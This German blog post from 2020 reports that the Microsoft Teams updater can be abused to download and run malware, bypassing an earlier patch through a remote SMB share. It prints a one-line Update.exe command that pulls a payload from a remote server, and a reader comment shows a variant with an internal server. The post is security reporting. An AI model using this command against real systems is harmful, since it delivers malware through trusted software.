Malware kann Microsoft Teams Updater missbrauchen

Publiziert am 7. August 2020 von Günter Born

[English]Der Updater von Microsoft Teams kann von Hackern als Living off the Land-Binary (LoLBin) missbraucht werden, um Malware remote auf dem System des Anwenders zu installieren. Bemühungen von Microsoft, diese Schwachstelle zu eliminieren, funktionieren zwar bis zu einem gewissen Grad,  können Angreifer letztendlich aber nicht davon abhalten, Teams zu missbrauchen, um ihre Malware zu platzieren und auszuführen.

Anzeige

Ich bin gleich über zwei Stellen auf dieses Thema gestoßen. Einmal hat Bleeping Computer das in diesem Artikel aufbereitet. Zudem hat jemand, der eine Schwachstelle gefunden hat, das auf Twitter bekannt gegeben.

Laut Bleeping Computer war bereits vor einem Jahr eine Schwachstelle in Microsoft Teams entdeckt und beschrieben worden. Der Update-Mechanismus, wie er seinerzeit in der Teams Desktop-Anwendung von Microsoft Teams implementiert ist, ermöglicht das Herunterladen und Ausführen beliebiger Dateien auf dem System. Reegun Jayapaul, jetzt Lead Threat Architect für SpiderLabs bei Trustwave, hatte das Problem ebenfalls 2019 gefunden und technische Details veröffentlicht. Microsoft hat dann einen Patch bereitgestellt, der die Ausnutzbarkeit dieser Schwachstelle beseitigen sollte.

Angriff als Variante möglich

Jetzt hat Sicherheitsforscher Reegun Richard, die in obigem Tweet erwähnte Schwachstelle entdeckt. Der Patch, der zuvor den Teams zur Verfügung gestellt wurde, sollte die Möglichkeit der Aktualisierung über eine URL einschränken. Der Updater erlaubt aber weiterhin lokale Verbindungen über eine Freigabe oder einen lokalen Ordner für Produktaktualisierungen. Als der Sicherheitsforscher diesen Befund beobachtete, stellte er jedoch fest, dass die durch den Patch hinzugefügten Einschränkungen leicht umgangen werden könnten, indem man auf eine entfernte SMB-Freigabe verweist. Hier ist ein Befehl:

Anzeige
Update.exe --update=\\remoteserver\payloadFolder

der eine Malware von einem Remote-Server holen und per Update ausführen lassen kann. Reegun schreibt dazu, dass die Schwachstelle es einem böswilligen Akteur erlaubte, den MS Teams Updater zu benutzen, um jede beliebige Binärdatei oder Nutzlast herunterzuladen. Diese Technik wird in der Regel als "Living Off the Land" bezeichnet und ist besonders gefährlich, da sie bekannte, gängige Software zum Herunterladen von Malware verwendet.

Details lassen sich den beiden verlinkten Artikeln entnehmen. Generell ist mir Teams sicherheitstechnisch nicht geheuer, da weitere Böcke in der Software schlummern. Ich hatte im Blog-Beitrag Microsoft Teams und die Sicherheit … schon mal darauf hingewiesen – habe aber nicht mehr verfolgt, was dann bei Microsoft in Sachen Absicherung von Teams passiert ist.

Ähnliche Artikel:
Microsoft Teams: Schwachstelle erlaubte Kontenübernahme
Microsoft Teams und die Sicherheit …
Verursacht Windows 10 VPN-Bug-Fix Update Teams-Probleme?
MS Teams: Bug verhindert Whiteboard-Nutzung in Europa
MS-Teams: Bei Windows Server auf virtuellen Speicher achten
Microsoft 'mahnt' Berliner Datenschutzbeauftragte ab
Zoom & Teams nicht DSGVO-konform einsetzbar

Anzeige
Dieser Beitrag wurde unter Sicherheit abgelegt und mit , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

Eine Antwort zu Malware kann Microsoft Teams Updater missbrauchen

  1. 1ST1 sagt:
    7. August 2020 um 10:18 Uhr

    Wie gut, wenn man auf der Firewall keine SMB-Pakete nach draußen durchlässt. Würde aber nichts gegen

    Update.exe –update=\\internalserver\payloadFolder

    helfen. Der ganze Update-Mechanismus von Teams ist Schei… Dass sich Teams.exe und Update.exe im Benutzerprofil-Ordner breit macht, ist auch Schei… Und das aus (mindestens) zwei Gründen: Man muss bei der Verwendung von Applocker Zertifikatsregeln anwenden, um Teams ausführbar zu machen. Wer noch die alte SRP verwendet, ist da aufgeschmissen, geht nicht, sonst startet bei einer Pfadregel von da eine update.exe, die kein Teams ist, sondern ein Schädling. Außerdem meckert die Win-Firewall beim Start von Teams, da hier aber dynamische Ports verwendet werden, und Teams im Userprofil liegt, kann man da weder eine Portregel bauen, noch eine Exe-Pfad-Regel, es sei denn man macht die für alle 10.000 Benutzer im Unternehmen. Warum liegt der Mist (oneDrive ist diesbezüglich der selbe Mist) nicht in %Program Files%, warum nutzt der Mist nicht die WSUS-/Intune/SCCM/… Updatemechanismen oder macht Updates wenigstens so wie Chredge???

    Und die Bedienung und Performance vom Teams Benutzerinterface ist sowiso alles andere als aktzeptabel. Mal zwischen verschiedenen Tenants gewechselt, sich aus einem Tenant gelöscht??? Leider wird es wohl kein anderer Hersteller hinbekommen, ein so ins MS-Office-Ökosystem tief verzahntes Koloborationstool hinzubekommen, das ist nämlich genau das, was die Leute wollen, nachdem sie den Mist mal im Einsatz gesehen haben… Wehret den Anfängen, wo ihr nur könnt!

    Antworten

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Hinweis: Bitte beachtet die Regeln zum Kommentieren im Blog (Erstkommentare und Verlinktes landet in der Moderation, gebe ich alle paar Stunden frei, SEO-Posts/SPAM lösche ich rigoros). Kommentare abseits des Themas bitte unter Diskussion.

Du findest den Blog gut, hast aber Werbung geblockt? Du kannst diesen Blog auch durch eine Spende unterstützen.